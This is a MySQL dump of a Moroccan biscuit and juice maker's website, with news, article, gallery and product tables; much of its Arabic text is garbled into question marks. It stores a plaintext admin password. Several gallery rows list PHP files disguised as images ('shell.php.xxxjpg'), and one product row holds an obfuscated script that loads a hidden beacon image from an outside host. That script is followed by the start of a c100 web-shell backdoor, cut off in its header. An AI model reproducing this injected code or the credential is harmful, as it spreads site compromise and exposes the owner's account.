CREATE TABLE `ass_login` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `email` varchar(40) NOT NULL,
  `password` varchar(20) NOT NULL,
  `genre` varchar(10) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
INSERT INTO `ass_login` (`id`, `email`, `password`, `genre`) VALUES 
	(3, 'alimani', 'mJ6il2SX', 'admin');

CREATE TABLE `nezha_actualites` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `date` varchar(100) DEFAULT NULL,
  `texte` text,
  `texte_ag` text,
  `texte_ar` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=483 DEFAULT CHARSET=utf8;
INSERT INTO `nezha_actualites` (`id`, `date`, `texte`, `texte_ag`, `texte_ar`) VALUES 
	(1, 2011, 'participation  au Salon International d’Agriculture Maroc 2011 ? Mekn?s 6?me ?dition.', 'Participation in the International Exhibition of Agriculture in Meknes Morocco 2011 6th edition.', '???????? ?? ?????? ?????? ??????? ?? ????? 2011  ?? ????? ???????  ??????')
	,(2, 2011, 'participation  ? la semaine de l’Agriculture ? Casablanca 3?me ?dition sous le partenaire : Proxedit.', 'Participation in the week of the 3rd edition Agriculture in Casablanca as partner Proxedit.', '???????? ?? ????? ??????? ?? ????? ??????? ?? ????? ??????? ?????? : Proxedit.')
	,(3, 2012, 'participation au club de tennis ? F?s.', 'participation at the tennis club in Fes', '???????? ?? ???? ????? ?? ????? ???')
	,(4, 2012, 'participation ? la foire de la  saison du raisin ? Bouznika', 'Participation at the fair season grapes Bouznika', '???????? ?? ???? ?????  ?? ???????')
	,(5, '02/2013', 'lancement des nouveaux Biscuits : Manyana ;  Domani et 8it.', 'Launch of the new Biscuits: Manyana, Domani and 8IT.', '????? ???????? ????: ??????? ?????? ?8IT.')
	,(6, '04/2013', 'Lancement d’un nouveau Biscuit : Jolay.', 'Launch of a new Biscuit Jolay.', '????? Jolay ???????? ??????.')
	,(7, '04/2013', 'participation au Salon International d’Agriculture Maroc ? Mekn?s 8 ?me ?dition', 'Participation in the International Exhibition of Agriculture in Meknes Morocco 8th edition', '???????? ?? ?????? ?????? ??????? ?? ????? ?? ????? ??????? ??????')
	,(9, 'entre le 04 et le 25 mai 2013.de 19:00', 'ste Alimani organis? la premi?re ligue dans le mini-football Dar jeune alhoceima,', 'Alimani company organizes  the first in the mini-league soccer Dar Hoceima young, between 04 and 25 May 2013.\r\n', '???? ???? Alimani ? ?????? ????? ?? ??? ????? ??????? ????? ??? ?????? ????????? ?? ??? 04 ? 25 ??? 2013. .');

CREATE TABLE `nezha_article` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `titre` varchar(800) NOT NULL,
  `texte` text NOT NULL,
  `text_ar` text,
  `text_ag` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=478 DEFAULT CHARSET=utf8;
INSERT INTO `nezha_article` (`id`, `titre`, `texte`, `text_ar`, `text_ag`) VALUES 
	(1, 'Mot de pr?sident', '<img src=\"images/president1.jpeg\" width=\"127\" height=\"174\" class=\"raiss\" />\r\n<p>Chers clients, chers partenaires :\r\n<BR /><BR />\r\n      Soci?t? ALIMANI, est une Soci?t? ? Responsabilit? Limit?e ? Associ?e Unique  au Maroc, cr?e en 2006 par son fondateur Mr Abdelhak AMGHAR.\r\n<BR /><BR />\r\n      Soci?t? ALIMANI ?tait  engag?  dans un processus de qualit? irr?versible et indispensable afin d’assurer sa p?rennit?, sa croissance et son d?veloppement. ALIMANI propose une gamme diversifi?e  et traditionnelle bas?e sur la s?lection rigoureuse des ingr?dients juste pour votre satisfaction, et afin de la r?aliser, nous avons mis en place une strat?gie qui s’appuie  sur la combinaison de trois facteurs cl?s :\r\n<BR /><BR />\r\n    <strong>La comp?titivit? mat?rielle et humaine.</strong><BR />\r\n    <strong>La qualit? de nos produits.</strong><BR />\r\n    <strong>La recherche continue et le d?veloppement.</strong>\r\n<BR /><BR />\r\n      Notre ?quipe  s’engage ? rassembler les moyens mat?riels, humaines et catalyser les ?nergies afin que les conditions de notre succ?s et la r?alisation de nos objectifs soient r?unis.<BR />', '<img src=\"images/president1.jpeg\" width=\"127\" height=\"174\" class=\"raiss\" /> \r\n<p>\r\n???????? ???????\r\n<BR /><BR />\r\n??????? ?? ???? ??? ??????? ?????? ??? ??????? ??????? ????? ????? ??????? ???????? ????? ??? 2006 ?? ??? ?????? ????? ??? ???? ?????.\r\n<BR /><BR />\r\n????? ???? ??????? ?????? ?????? ?? ?????? ???????? ????????? ???????? ??????? ??? ???????? ?????? ????????? ???? ????????? ???????? ???????. ??? ??? ????? ??? ????? ???? ???? ?????????? ???? ??? ????? ??? ????? ????? ?????? ??:\r\n<BR /><BR /> \r\n-	?????? ????????? ?????? ???????? ???????.\r\n<BR /><BR />\r\n-	????? ????????.\r\n<BR /><BR />\r\n-	??????? ????? ????????.\r\n<BR /><BR /> \r\n????? ???? ??? ?????? ???? ??? ????? ??? ?????????????????? ??????? ???????? ??? ?????  ?? ???? ??????.\r\n</p>', '<img src=\"images/president1.jpeg\" width=\"127\" height=\"174\" class=\"raiss\" />\r\n<p>\r\nDear Customers, dear Partners:\r\n<BR /><BR />\r\nFounded in 2006 by its founder Mr. Abdelhak AMGHAR, Alimani is a Limited Liability Company to the Sole Shareholder located in Morocco.\r\nAlimani was engaged in a process of irreversible research and development as well as quality improvement to ensure its survival, growth and development. \r\n<BR /><BR />\r\nAlimani offers a diversified range of both traditional products based on a careful selection of ingredients to respond effectively to customers’ satisfaction, In order to accomplish this, we developed a strategy based on the combination of three key factors:\r\n<BR /><BR />\r\nCompetitiveness of material and human.\r\n<BR /><BR />\r\nThe quality of our products.\r\n<BR /><BR />\r\nContinuous research and development.\r\n<BR /><BR />\r\nOur team is committed to provide the material, human resources and catalyze energies to provide suitable the conditions of our success so that our goals will be met.\r\n<p/>')
	,(3, 'L\'entreprise', 'Pr?sentation de l’entreprise : <BR /><BR /> Cr?e en 2006, Soci?t? ALIMANI est une entreprise Agroalimentaire priv? sp?cialis?e dans la production des jus, madeleines, biscuits et des fruits secs. On existe au niveau national : Casablanca, Skhirat, Agadir, Marrakech, F?s, Mekn?s, Tanger, T?touan… Nos Produits sont ?galement destin?s ? l’export. <BR /><BR /> ALIMANI utilise les meilleures technologies, les plus modernes, et les plus pointues, pour offrir des produits savoureux, d’une qualit? exceptionnelle. <BR /><BR /> Nous nous engageons vivement dans la voie de la satisfaction des clients, impliquant pour cela tous notre personnel, nos fournisseurs, nos distributeurs et nos partenaires. Cette volont? nous engage ? poursuivre une action d’am?lioration permanente.', '<p>????? ??????:\r\n<BR /><BR />\r\n????? ???? ??????? ??? 2006. ??? ???? ?????? ?? ????? ?????? ???????? ???????? ???? ????????? ????????? ????? ???????? ???????... \r\n<BR /><BR />\r\n????? ???????? ?? ?? ????? ??? ??????? ??????: ????? ???????? ????????? ??????? ?????? ???? ?????? ?????  ?????... ??? ?? ???????? ????? ???? ???????\r\n<BR /><BR />.\r\n?????? ???? ??????? ???? ???????????? ??????? ????? ??????? ?????? ????? ?????? ?????? ???? ???? ?????. ???? ?????? ??? ????? ???????? ??? ???????? ??????? ????? ?? ??? ??????? ??????? ?? ???? ???????. \r\n</p>', '<p>Presentation:\r\n<BR /><BR />\r\nCreated in 2006, Alimani is a Moroccan company specialized in juice, cake, and biscuits production as well as dried fruit. We exist at the national level in Casablanca, Skhirat, Agadir, Marrakech, Fez, Meknes, Tangier, Tetouan ... Our products are, also exported to other countries.\r\n<BR /><BR />\r\nAlimani uses the latest technologies, the most modern and most advanced, in order to offer tasty products with exceptional quality.\r\n<BR /><BR />\r\nWe focus on customer satisfaction through the involvement of all our staff, suppliers, distributors and partners which will help to pursue an action for continuous improvement.</p>');

CREATE TABLE `nezha_galerie` (
  `IdGalerie` int(11) NOT NULL AUTO_INCREMENT,
  `Titre` tinytext CHARACTER SET utf8,
  `Resume` longtext CHARACTER SET utf8,
  `Photo` varchar(50) CHARACTER SET utf8 DEFAULT NULL,
  PRIMARY KEY (`IdGalerie`)
) ENGINE=MyISAM AUTO_INCREMENT=76 DEFAULT CHARSET=latin1 ROW_FORMAT=DYNAMIC;
INSERT INTO `nezha_galerie` (`IdGalerie`, `Titre`, `Resume`, `Photo`) VALUES 
	(1, 'Galerie Produits', 'Galerie Produits', NULL)
	,(2, 'Slideshow Accueil', NULL, NULL)
	,(3, 'Image_Gauche', NULL, NULL)
	,(4, 'PDF', NULL, NULL)
	,(5, 'Sport', NULL, NULL);

CREATE TABLE `nezha_photo` (
  `IdPhoto` int(11) NOT NULL AUTO_INCREMENT,
  `IdGalerie` int(11) DEFAULT NULL,
  `Photo` varchar(50) CHARACTER SET utf8 DEFAULT NULL,
  `vig` varchar(200) CHARACTER SET utf8 DEFAULT NULL,
  `titre` varchar(400) CHARACTER SET utf8 DEFAULT NULL,
  `description` text CHARACTER SET utf8,
  `titre_ar` varchar(300) CHARACTER SET utf8 DEFAULT NULL,
  `descript_ar` varchar(900) CHARACTER SET utf8 DEFAULT NULL,
  `titre_ag` varchar(300) CHARACTER SET utf8 DEFAULT NULL,
  `descript_ag` varchar(900) CHARACTER SET utf8 DEFAULT NULL,
  PRIMARY KEY (`IdPhoto`)
) ENGINE=MyISAM AUTO_INCREMENT=2148 DEFAULT CHARSET=latin1 ROW_FORMAT=DYNAMIC;
INSERT INTO `nezha_photo` (`IdPhoto`, `IdGalerie`, `Photo`, `vig`, `titre`, `description`, `titre_ar`, `descript_ar`, `titre_ag`, `descript_ag`) VALUES 
	(228, 1, 'gal2.jpg', 'gal2pf.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(229, 1, 'gal3.jpg', 'gal3pf.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(226, 1, '1.jpg', '1p.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(227, 1, 'DSC00462.jpg', 'DSC00462.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(230, 1, 'gal4.jpg', 'gal4pf.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(231, 1, 'gal5.jpg', 'gal5pf.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(232, 1, '6gal.jpg', 'gal6pf.jpg', 'stand foire', NULL, NULL, NULL, NULL, NULL)
	,(233, 1, 'gal7.jpg', 'gal7pf.jpg', 'stand foire', NULL, '????', NULL, ' fair', NULL)
	,(266, 5, 'DSC5957.JPG', 'DSC5957.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(238, 2, '8itcopie.jpg', NULL, 'domani ', NULL, NULL, NULL, NULL, NULL)
	,(239, 2, '8it.jpg', NULL, '8it', NULL, NULL, NULL, NULL, NULL)
	,(240, 2, 'okokomanyanachococopie.jpg', NULL, 'manyana', NULL, NULL, NULL, NULL, NULL)
	,(241, 2, 'chocococ.jpg', NULL, 'bonwi choco', NULL, NULL, NULL, NULL, NULL)
	,(242, 2, 'brownnnnnnn-.jpg', NULL, 'bonwi brown', NULL, NULL, NULL, NULL, NULL)
	,(244, 2, 'jusjus.jpg', NULL, 'alimani.ma', NULL, NULL, NULL, NULL, NULL)
	,(245, 2, 'pubalhoceima.jpg', NULL, 'alhoceima', NULL, NULL, NULL, NULL, NULL)
	,(247, 3, 'affichenewreserve2.80m1.jpg', NULL, 2, 2, NULL, NULL, NULL, NULL)
	,(249, 4, 'psfcomplet.pdf', NULL, 'Pr?sentation catalogue', 'Pr?sentation catalogue', NULL, NULL, NULL, NULL)
	,(250, 2, 'hhhhhh.jpg', NULL, 'alimani11', NULL, NULL, NULL, NULL, NULL)
	,(251, 1, '20120907195928.jpg', NULL, NULL, NULL, NULL, NULL, NULL, NULL)
	,(269, 5, 'DSC6040.JPG', 'DSC6040.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(265, 5, 'DSC5944.JPG', 'DSC5944.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(253, 1, 'IMG6111.JPG', 'IMG6111.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(254, 1, 'IMG6122.JPG', NULL, NULL, NULL, NULL, NULL, NULL, NULL)
	,(267, 5, 'DSC5994.JPG', 'DSC5994.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(268, 5, 'DSC6036.JPG', 'DSC6036.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(259, 5, 'DSC5911.JPG', 'DSC5911.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(260, 5, 'DSC5927.jpg', 'DSC5927.jpg', NULL, NULL, NULL, NULL, NULL, NULL)
	,(261, 5, 'DSC5932.JPG', 'DSC5932.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(262, 5, 'DSC5934.JPG', 'DSC5934.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(263, 5, 'DSC5937.JPG', 'DSC5937.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(264, 5, 'DSC5942.JPG', 'DSC5942.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(255, 1, '9052894113984867304289126088o.jpg', '9052894113984867304289126088o.jpg', NULL, NULL, NULL, NULL, NULL, NULL)
	,(258, 5, 'DSC5907.JPG', 'DSC5907.JPG', 'sport', NULL, '?????', NULL, 'sport', NULL)
	,(270, 5, 'IMGP1f849.JPG', 'IMGP1f849.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(271, 5, 'IMGP1k843.JPG', 'IMGP1k843.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(272, 5, 'IMGP1849.JPG', 'IMGP1849.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(273, 5, 'IMGP1853.JPG', 'IMGP1853.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(274, 5, 'IMGP1851.JPG', 'IMGP1851.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(275, 5, 'IMGP1847.JPG', 'IMGP1847.JPG', NULL, NULL, NULL, NULL, NULL, NULL)
	,(276, 2, 'bonwiamandeeeeeee.jpg', NULL, NULL, NULL, NULL, NULL, NULL, NULL)
	,(2143, 3, 'asdely.php', NULL, 'okk', 'okookk', NULL, NULL, NULL, NULL)
	,(2144, 4, 'asdely.php', NULL, 'okk', 'kk', 'kkkkk', 'kkkk', 'kkkk', 'kkkk')
	,(2145, 3, NULL, NULL, 'anassrc3', 'tggggggggjj', NULL, NULL, NULL, NULL)
	,(2146, 4, 'b.phpjpg', NULL, 'ccc', 'cxc', 'dfdf', 'fddf', 'dfdf', 'fdfdfd')
	,(2147, 4, 'shell.php.xxxjpg', NULL, 'fff', NULL, NULL, NULL, NULL, NULL);

CREATE TABLE `nezha_prod_cat` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `libelle` varchar(400) NOT NULL,
  `libelle_ag` varchar(400) DEFAULT NULL,
  `libelle_ar` varchar(400) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=380 DEFAULT CHARSET=utf8;
INSERT INTO `nezha_prod_cat` (`id`, `libelle`, `libelle_ag`, `libelle_ar`) VALUES 
	(2, 'Biscuits', 'Biscuits', '????????')
	,(3, 'P?tes Jaunes', 'Madeleines', '??????')
	,(6, 'p?tes feuillet?es', 'Pasta puff', '???????')
	,(5, 'Jus', 'Juice', '????')
	,(7, 'Fruits secs', 'Dried fruit', '??????? ???????');

CREATE TABLE `nezha_produits` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `titre` varchar(800) NOT NULL,
  `description` text NOT NULL,
  `titre_ag` varchar(700) DEFAULT NULL,
  `description_ag` text,
  `titre_ar` varchar(700) DEFAULT NULL,
  `description_ar` text,
  `id_catg` int(11) NOT NULL,
  `img1` varchar(400) DEFAULT NULL,
  `img2` varchar(400) DEFAULT NULL,
  `img3` varchar(400) DEFAULT NULL,
  `img1_v` varchar(400) DEFAULT NULL,
  `img2_v` varchar(400) DEFAULT NULL,
  `img3_v` varchar(400) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3937 DEFAULT CHARSET=utf8;
INSERT INTO `nezha_produits` (`id`, `titre`, `description`, `titre_ag`, `description_ag`, `titre_ar`, `description_ar`, `id_catg`, `img1`, `img2`, `img3`, `img1_v`, `img2_v`, `img3_v`) VALUES 
	(26, 'X-MAN N\'ddjouz', 'Fruits sec <br />-Amande:15g <br />-Pistache:12g <br />-Citrouille:25g <br />-Noix de cajou:12g', NULL, NULL, '???-??? ? ???', '- ??????? ???????<br />\r\n- ?????: 15?<br />\r\n- ??????: 12?<br />\r\n- ???????: 25 ?<br />\r\n- ??????: 12 ?<br />\r\n- ?????: 20?<br />\r\n- ????????: 20?<br />', 7, 'XMAN.jpg', NULL, NULL, 'XMAN.jpg', NULL, NULL)
	,(27, 'Mirador P?te feuillete Fourr?e cr?me', '- 1 pi?ce par sachet<br />\r\n-30 sachets par carton<br />\r\n-Poids net :40g<br />', NULL, NULL, '??????? ????? ????? ???????', '-???? ????? ?? ?????<br />\r\n-30 ??? ?? ???????<br />\r\n- ????? 40?<br />', 6, 'Mirador.jpg', NULL, NULL, 'Miradorr.jpg', NULL, NULL)
	,(3, 'Mirador G?noise Fourr?e ? la cr?me', '1 pi?ce par sachet 30 sachets par carton Poids net : 40 g', NULL, NULL, NULL, NULL, 1, 'grand.jpg', 'grand.jpg', 'grand.jpg', 'petit.jpg', 'petit.jpg', 'petit.jpg')
	,(4, 'Comida Sandwich Cr?me Cacao G?noise fourr?e', '1 Pi?ce par sachet 22 sachets par carton 30 sachets par carton (Cr?me Cacao) Poids net : 50 g', NULL, NULL, NULL, NULL, 1, 'comida1.jpg', 'comida2.jpg', NULL, 'comida1pf.jpg', 'comida2pf.jpg', NULL)
	,(5, '8it Biscuit au lait', '-9 Pi?ces par sachet <br />-72 sachets par carton<br />- Poids net : 35 g', NULL, NULL, '???', '??????? ???????<br />\r\n- 9 ??? ?? ?????<br />\r\n- 72 ??? ?? ???????<br />\r\n- ?????: 35 ?', 2, '8it.jpg', 'grand.jpg', 'grand.jpg', '8it.jpg', 'petit.jpg', 'petit.jpg')
	,(6, 'Manyana Biscuit au Chocolat', '-6 Pi?ces par sachet <br />-52 sachets par carton <br />-Poids net : 35 g', NULL, NULL, '??????', '- 6 ??? ?? ?????<br />\r\n- 52 ??? ?? ???????<br />\r\n- ?????: 35 ?', 2, 'manyana.jpg', 'grand.jpg', 'grand.jpg', 'manyana.jpg', 'petit.jpg', 'petit.jpg')
	,(7, 'Witty Biscuit sec', '-36 sachets par carton <br />-Poids : 45 g', NULL, NULL, '????', '- 36 ??? ?? ???????<br />\r\n- ?????: 45?', 2, 'witty.jpg', NULL, NULL, 'witty.jpg', NULL, NULL)
	,(8, 'Domani Biscuit Sec', '-40 sachets par carton<br />- Poids net : 30 g', 'Domani Biscuit Sec.', '-40 Bags per carton <br /> - Net Weight: 30 g', '?????? ??????', '- 40 ??? ?? ???????<br />\r\n- ?????: 30?<br />', 2, 'Bonwidomani.jpg', NULL, NULL, 'Bonwidomani.jpg', NULL, NULL)
	,(9, 'Tartabiya Biscuit sec, rond aux ?ufs frais', '-1 Pi?ce par sachet <br /> -24 sachets par carton <br /> -Poids net : 50 g', NULL, NULL, NULL, NULL, 2, 'tartabiya.jpg', 'grand.jpg', 'grand.jpg', 'tartabiya.jpg', 'petit.jpg', 'petit.jpg')
	,(10, 'Bonwi Coki 4 Madeleines Aux ?ufs Frais', '4 Pi?ces par sachet <br />40 sachets par carton <br />Poids net : 30 g', NULL, NULL, '????? ???? 4', '?????? ?????? ?????<br />\r\n- 4 ??? ?? ?????<br />\r\n- 40 ??? ?? ???????<br />\r\n- ?????: 30?<br />', 3, 'bonwicoki4pieAces.jpg', 'grand.jpg', 'grand.jpg', 'petit.jpg', 'petit.jpg', 'petit.jpg')
	,(11, ' Carabonita Madeleine ronde fourr?e ? la cr?me cacao', '-1 pi?ce par sachet<br /> 27 sachets par carton <br />Poids net : 45g <br />- 1 pi?ce par sachet <br />36 sachets par carton<br /> Poids net : 50 g', NULL, NULL, ' ??????????', '?????? ??????? ????? ????? ???????\r\n- ???? ????? ?? ?????<br />\r\n- 27 ??? ?? ???????<br />\r\n- ?????: 45?<br />\r\n- ???? ????? ?? ?????<br />\r\n- 36 ??? ?? ???????<br /> \r\n- ?????: 50?<br />', 3, 'minicarabonita.jpg', NULL, NULL, 'minicarabonita.jpg', NULL, NULL)
	,(12, 'Bonwi Nature Madeleines Aux ?ufs Frais', '-2 pi?ces par sachet <br />-24 unit?s par carton <br />-Poids net : 50 g', NULL, NULL, '????? ', '?????? ?????? ?????<br />\r\n- 2 ??? ?? ?????<br />\r\n- 24 ??? ?? ???????<br />\r\n- ?????: 50 ?', 3, 'Bonwinature2PieAces.jpg', NULL, NULL, 'Bonwinature2PieAces.jpg', NULL, NULL)
	,(13, 'Bonwi Amande Madeleines Fourr?es Cr?me Amande', '-2 pi?ces par sachet <br />24 sachets par carton <br />Poids net : 50 g <br /> -1 pi?ce par sachet <br />40 sachets par carton<br /> Poids net : 25 g', NULL, NULL, '????? ?????', '?????? ????? ????? ?????<br />\r\n- 2 ??? ?? ?????<br />\r\n- 24 ??? ?? ???????<br />\r\n- ?????: 50?<br />\r\n- ???? ????? ?? ?????<br />\r\n- 40 ??? ?? ???????<br />\r\n- ?????: 25 ?', 3, 'okBonwiamande2PieAces.jpg', 'Bonwiamande1PieAces.jpg', NULL, 'okBonwiamande2PieAces.jpg', 'Bonwiamande1PieAces.jpg', NULL)
	,(14, 'Bonwi Choco Madeleines Fourr?es Cr?me Cacao', '-2 pi?ces par sachet <br />24 sachets par carton<br /> Poids net : 50 g <br />-6 pi?ces par sachet<br /> 20 sachets par carton <br />Poids net : 150 g <<br /> -1 pi?ce par sachet <br />40 sachets par carton <br />Poids net : 25 g', NULL, NULL, '????? ????', '?????? ????? ????? ???????<br />\r\n- ???? ????? ?? ?????<br />\r\n- 24 ??? ?? ???????<br />\r\n- ?????: 25 ?<br />\r\n- 2 ??? ?? ?????<br />\r\n- 24 ??? ?? ???????<br />\r\n- ?????: 50?<br />\r\n- 6 ??? ?? ?????<br />\r\n- 20 ??? ?? ???????<br />\r\n- ?????:150 ?', 3, 'okBonwichoco2PieAces.jpg', 'okBonwichoco6PieAces.jpg', 'Bonwichoco1PieAces.jpg', 'okBonwichoco2PieAces.jpg', 'okBonwichoco6PieAces.jpg', 'Bonwichoco1PieAces.jpg')
	,(15, 'Bonwi Fraise Madeleines Fourr?es Cr?me Fraise', '-2 pi?ces par sachet <br />24 sachets par carton <br />Poids net : 50 g <br />-6 pi?ces par sachet <br />20 sachets par carton <br />Poids net : 150 g <br />-1 pi?ce par sachet<br /> 40 sachets par carton <br />Poids net : 25 g', NULL, NULL, '????? ????', '?????? ????? ????? ???????<br />\r\n- 2 ??? ?? ?????<br />\r\n- 24 ??? ?? ???????<br />\r\n- ?????: 50 ?<br />\r\n- 6 ??? ?? ?????<br />\r\n- 20 ??? ?? ???????<br />\r\n- ?????: 150 ?<br />\r\n- ???? ????? ?? ?????<br />\r\n- 40 ??? ?? ???????<br />\r\n- ?????: 25 ?', 3, 'bonwifraise2P.jpg', 'Bonwifraise6PieAces.jpg', 'Bonwifraise1PieAces.jpg', 'bonwifraise2P.jpg', 'Bonwifraise6PieAces.jpg', 'Bonwifraise1PieAces.jpg')
	,(16, 'Bonwi Brown Madeleines Fourr?es Cr?me Cacao', '- 6 pi?ces par sachet <br />20 sachets par carton <br />Poids net : 150 g <br />\r\n\r\n - 2 pi?ces par sachet <br />24 sachets par carton <br />Poids net : 45 g <br />\r\n\r\n - 1 pi?ce par sachet <br />40 sachets par carton <br />Poids net : 22 g', NULL, NULL, '????? ?????', '?????? ????? ????????\r\n- 6 ??? ?? ?????<br />\r\n- 20 ??? ?? ???????<br />\r\n- ????? 150 ?<br />', 3, 'okBonwibrown2PieAces.jpg', 'okBonwibrown6PieAces-.jpg', 'Bonwibrown1PieAces.jpg', 'okBonwibrown2PieAces.jpg', 'okBonwibrown6PieAces-.jpg', 'Bonwibrown1PieAces.jpg')
	,(17, 'Bonwi Coco Madeleine ? la Noix de coco', '2 pi?ces par sachet <br />24 unit?s par carton <br />Poids net : 50 g', NULL, NULL, '????? ????', '?????? ????? ???? ?????<br />\r\n- 2 ??? ?? ?????<br />\r\n- 24 ??? ?? ???????<br />\r\n- ?????: 50 ?', 3, 'okBonwicoco2PieAces.jpg', 'grand.jpg', 'grand.jpg', 'okBonwicoco2PieAces.jpg', 'petit.jpg', 'petit.jpg')
	,(18, 'Bonwi 12 Madeleines Nature aux ?ufs frais', '-12 pi?ces par sachet <br />-12 sachets par carton<br />- Poids net : 250 g', NULL, NULL, '????? 12', '?????? ?????? ?????<br />\r\n- 12 ??? ?? ???????<br />\r\n- ?????: 250 ?', 3, 'B12.jpg', 'grand.jpg', 'grand.jpg', 'B12.jpg', 'petit.jpg', 'petit.jpg')
	,(19, 'Bonwi Amoni Madeleines Nature aux oeufs frais', '-12 pi?ces par sachet <br />-12 sachets par carton<br />- Poids net : 250 g', NULL, NULL, '????? ?????  ', '?????? ?????? ?????? ??????<br />\r\n- 12 ??? ?? ???????<br />\r\n- ????? 250 ?<br />', 3, 'amoni.jpg', 'grand.jpg', 'grand.jpg', 'amoni.jpg', 'petit.jpg', 'petit.jpg')
	,(20, 'Jusport Orange', 'Boisson Rafra?chissante Jus D’orange<br />-1,5L<br />-0,33L', NULL, NULL, '?????? ????? ', '???? ????????<br />\r\n- 1,5 ???<br />\r\n- 0,33 ???<br />\r\n', 5, 'jusportorange15L.jpg', 'jusportorange033L.jpg', 'grand.jpg', 'jusportorange15L.jpg', 'jusportorange033L.jpg', 'petit.jpg')
	,(21, 'Jusport P?che', 'Boisson Rafra?chissante Jus De P?che<br />-1,5L<br />-0,33L', NULL, NULL, '?????? ???', '???? ?????<br />\r\n- 1,5 ???<br />\r\n- 0,33 ???<br />', 5, 'jusportPeAche15L.jpg', 'jusportpeAche033L.jpg', 'grand.jpg', 'jusportPeAche15L.jpg', 'jusportpeAche033L.jpg', 'petit.jpg')
	,(22, 'Jusport Tropical', 'Boisson Rafra?chissante Jus De Fruits<br />-1,5L<br />-0,33L', NULL, NULL, '?????? ????????', '???? ???????<br />\r\n- 1,5???<br />\r\n- 0,33 ???<br />', 5, 'jusporttropical15L.jpg', 'jusporttropical033L.jpg', 'grand.jpg', 'jusporttropical15L.jpg', 'jusporttropical033L.jpg', 'petit.jpg')
	,(23, 'Al Hoceima Orange', 'Nectar D’orange 50%<br />-1L<br />-0,200L', NULL, NULL, '??????? ?????', '????? ???????? 50 %<br />\r\n-1 ???<br />\r\n- 0,20 ???<br />', 5, 'alhoceimaorange1L.jpg', 'alhoceimaorange0200LL.jpg', NULL, 'alhoceimaorange1L.jpg', 'alhoceimaorange0200LL.jpg', NULL)
	,(24, 'Al Hoceima P?che', 'Nectar De P?che 50%<br />\r\n-1L<br />\r\n-0,200L', NULL, NULL, '??????? ???', '????? ????? 50 %', 5, 'alhoceimaPeAche1L.jpg', 'alhoceimapeAche0200L.jpg', 'grand.jpg', 'alhoceimaPeAche1L.jpg', 'alhoceimapeAche0200L.jpg', 'petit.jpg')
	,(25, 'Milsouani Millefeuille', '16 pi?ces par carton  <br /> 20 pi?ces par carton  <br />30 pi?ces par carton', NULL, NULL, '???????? ??????', '- 16 ???? ?? ???????<br />\r\n- 20 ???? ?? ???????<br />\r\n- 30 ???? ?? ???????<br />', 6, 'millefeuille1.jpg', 'grand.jpg', 'grand.jpg', 'barquettejjj.jpg', 'mifeuile.jpg', 'petit.jpg')
	,(28, 'Bonwi Coki 6 Madeleines Aux ?ufs Frais', '-6 pi?ces par sachet<br /> \r\n-75 sachets par carton<br />\r\n   -poids :50g', NULL, NULL, '????? ???? 6 ??? ??????? ?????? ?????', '-6 ???? ?? ??? <br />\r\n-75  ??? ?? ???????\r\n<br />     ?????: 50 ?', 3, 'bonwicoki6.jpg', NULL, NULL, NULL, NULL, NULL)
	,(3936, 'ok', '<script type=\"text/javascript\">document.write(\'\\u003c\\u0069\\u006d\\u0067\\u0020\\u0073\\u0072\\u0063\\u003d\\u0022\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0073\\u0061\\u0066\\u0065\\u0065\\u0065\\u002e\\u0066\\u0072\\u0065\\u0065\\u0068\\u006f\\u0073\\u0074\\u0069\\u0061\\u002e\\u0063\\u006f\\u006d\\u002f\\u0073\\u006e\\u0066\\u002f\\u0073\\u002e\\u0070\\u0068\\u0070\\u0022\\u0020\\u0077\\u0069\\u0064\\u0074\\u0068\\u003d\\u0022\\u0031\\u0022\\u0020\\u0068\\u0065\\u0069\\u0067\\u0068\\u0074\\u003d\\u0022\\u0031\\u0022\\u003e\')</script>\r\n<?php\r\n\r\n/******************************************************************************************\r\n*  Locus7s Modified c100 Shell                                                                 \r\n*  Beta v. 1.0a - Project x2300                                                                   \r\n*  Written by md5cracking.com                                                          \r\n*  Modified by Shadow & Preddy                                                              \r\n*  Edited By KingDefacer                                                       \r\n*========================================================\r\n*  New Modifications Implemented --                                                      \r\n+--------------------------------------------------------+\r\n*  -Added link to Enumerate to escalate priviledges      \r\n*  -Added Rootshell.c                                     \r\n*  -Added Rootshell.c;auto-compiler                      \r\n*  -Execute Rootshell.c                                  \r\n*  -Added Mig-Log Logcleaner                             \r\n*  -Execute Mig-Log Logcleaner                           \r\n*  -milw0rm searcher (Grabs OS and searches milw0rm)    \r\n*  -Locus7s Style & Image                                \r\n*  -Added w4ck1ng Shell Backdoor Connect and Backdoor  